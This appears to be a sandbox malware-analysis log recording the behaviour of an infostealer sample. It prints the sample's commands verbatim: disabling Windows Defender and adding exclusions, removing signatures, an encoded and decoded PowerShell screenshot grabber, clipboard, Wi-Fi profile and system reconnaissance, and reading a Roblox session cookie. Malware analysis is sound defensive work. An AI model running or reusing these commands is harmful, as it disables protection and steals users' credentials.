              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Encrypted powershell cmdline option found
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Modifies Windows Defender protection settings
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Removes signatures from Windows Defender
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
